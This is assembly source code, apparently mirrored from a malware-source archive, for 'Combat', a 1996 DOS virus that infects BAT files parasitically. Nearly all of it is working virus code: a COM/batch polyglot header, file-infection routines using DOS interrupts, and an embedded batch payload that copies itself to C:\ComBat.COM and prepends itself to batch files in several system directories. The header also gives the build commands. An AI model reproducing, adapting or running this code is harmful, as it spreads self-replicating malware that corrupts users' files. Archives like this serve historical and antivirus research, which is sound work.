mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 19:36:11 +00:00
143 lines
4.7 KiB
NASM
143 lines
4.7 KiB
NASM
|
;=====( Combat virus by Rajaat )===============================================
|
||
|
;
|
||
|
; Non-resident BAT infector, doesn't use external programs by third party.
|
||
|
;
|
||
|
;==============================================================================
|
||
|
;
|
||
|
; Virus name : Combat
|
||
|
; Author : Rajaat
|
||
|
; Origin : United Kingdom, July 1996
|
||
|
; Compiling : Using TASM
|
||
|
;
|
||
|
; TASM /M COMBAT
|
||
|
; TLINK /T COMBAT
|
||
|
; REN COMBAT.COM COMBAT.BAT
|
||
|
; Targets : BAT files
|
||
|
; Size : Doesn't matter
|
||
|
; Resident : No
|
||
|
; Polymorphic : No
|
||
|
; Encrypted : No
|
||
|
; Stealth : No
|
||
|
; Tunneling : No
|
||
|
; Retrovirus : No
|
||
|
; Antiheuristics: No
|
||
|
; Peculiarities : It infects BAT files parasitically
|
||
|
; Drawbacks : It's a goddamn BAT infector, what do you think?!?
|
||
|
; Behaviour : No really, find out yourself! I was bored and made this,
|
||
|
; do you really think I'd spend time explaining what it DOES?
|
||
|
; It's unknown what this virus might do besides replicate :)
|
||
|
;==============================================================================
|
||
|
;
|
||
|
; Results with antivirus software
|
||
|
;
|
||
|
; TBFILE - Not tested
|
||
|
; TBSCAN - Not tested
|
||
|
; TBMEM - Not tested
|
||
|
; TBCLEAN - Not tested
|
||
|
; SVS - Not tested
|
||
|
; SSC - Not tested
|
||
|
; F-PROT - Not tested
|
||
|
; F-PROT /ANALYSE - Not tested
|
||
|
; F-PROT /ANALYSE /PARANOID - Not tested
|
||
|
; AVP - Not tested
|
||
|
; VSAFE - Not tested
|
||
|
; NEMESIS - Not tested
|
||
|
;
|
||
|
;==============================================================================
|
||
|
|
||
|
.model tiny
|
||
|
.code
|
||
|
.radix 16
|
||
|
|
||
|
signature equ 5240
|
||
|
|
||
|
org 100
|
||
|
|
||
|
main:
|
||
|
db '@REM ',0ff
|
||
|
jmp com_entry
|
||
|
db ' * ComBat *'
|
||
|
db 0dh,0ah
|
||
|
db '@echo off',0dh,0ah
|
||
|
db 'goto ComBat',0dh,0ah
|
||
|
|
||
|
com_entry: mov si,80
|
||
|
cmp byte ptr ds:[si],0
|
||
|
je no_check
|
||
|
cld
|
||
|
find_argument: inc si
|
||
|
lodsb
|
||
|
dec si
|
||
|
cmp al,20
|
||
|
je find_argument
|
||
|
mov dx,si
|
||
|
find_end: lodsb
|
||
|
cmp al,0dh
|
||
|
jne find_end
|
||
|
mov byte ptr ds:[si-1],0
|
||
|
push dx
|
||
|
mov ax,3d02
|
||
|
int 21
|
||
|
jc no_check
|
||
|
xchg ax,bx
|
||
|
lea dx,virus_end
|
||
|
mov ah,3f
|
||
|
mov cx,3
|
||
|
int 21
|
||
|
mov ah,3e
|
||
|
int 21
|
||
|
pop dx
|
||
|
cmp word ptr virus_end,signature
|
||
|
je no_check
|
||
|
mov ax,4301
|
||
|
xor cx,cx
|
||
|
int 21
|
||
|
mov ah,3c
|
||
|
xor cx,cx
|
||
|
lea dx,temp_file
|
||
|
int 21
|
||
|
jc no_check
|
||
|
xchg ax,bx
|
||
|
mov ah,40
|
||
|
lea dx,main
|
||
|
mov cx,file_length
|
||
|
int 21
|
||
|
mov ah,3e
|
||
|
int 21
|
||
|
mov ax,4c00
|
||
|
int 21
|
||
|
|
||
|
db 0,'Rajaat / Genesis',0
|
||
|
|
||
|
no_check: mov ax,4c01
|
||
|
int 21
|
||
|
|
||
|
temp_file db 'ComBat.TMP',0
|
||
|
|
||
|
batch_2 db 0dh,0ah
|
||
|
db ':ComBat',0dh,0ah
|
||
|
db 'if #%_tmp%#==## goto no_call',0dh,0ah
|
||
|
db 'C:\ComBat.COM %1',0dh,0ah
|
||
|
db 'if errorlevel 1 goto done_ComBat',0dh,0ah
|
||
|
db 'type %1 >> ComBat.TMP',0dh,0ah
|
||
|
db 'echo. >> ComBat.TMP',0dh,0ah
|
||
|
db 'echo :done_ComBat >> ComBat.TMP',0dh,0ah
|
||
|
db 'copy ComBat.TMP %1 > nul',0dh,0ah
|
||
|
db 'del ComBat.TMP > nul',0dh,0ah
|
||
|
db 'goto done_ComBat',0dh,0ah
|
||
|
db ':no_call',0dh,0ah
|
||
|
db 'set _tmp=%0',0dh,0ah
|
||
|
db 'if #%_tmp%#==## set _tmp=AUTOEXEC.BAT',0dh,0ah
|
||
|
db 'if not exist %_tmp% set _tmp=%0.BAT',0dh,0ah
|
||
|
db 'if not exist %_tmp% goto path_error',0dh,0ah
|
||
|
db 'copy %_tmp% C:\ComBat.COM > nul',0dh,0ah
|
||
|
db 'for %%f in (*.bat c:\*.bat c:\dos\*.bat c:\windows\*.bat ..\*.bat) do call %_tmp% %%f',0dh,0ah
|
||
|
db 'del C:\ComBat.COM > nul',0dh,0ah
|
||
|
db ':path_error',0dh,0ah
|
||
|
db 'set _tmp=',0dh,0ah
|
||
|
file_length equ $-main
|
||
|
virus_end equ $
|
||
|
db ':done_ComBat',0dh,0ah
|
||
|
|
||
|
end main
|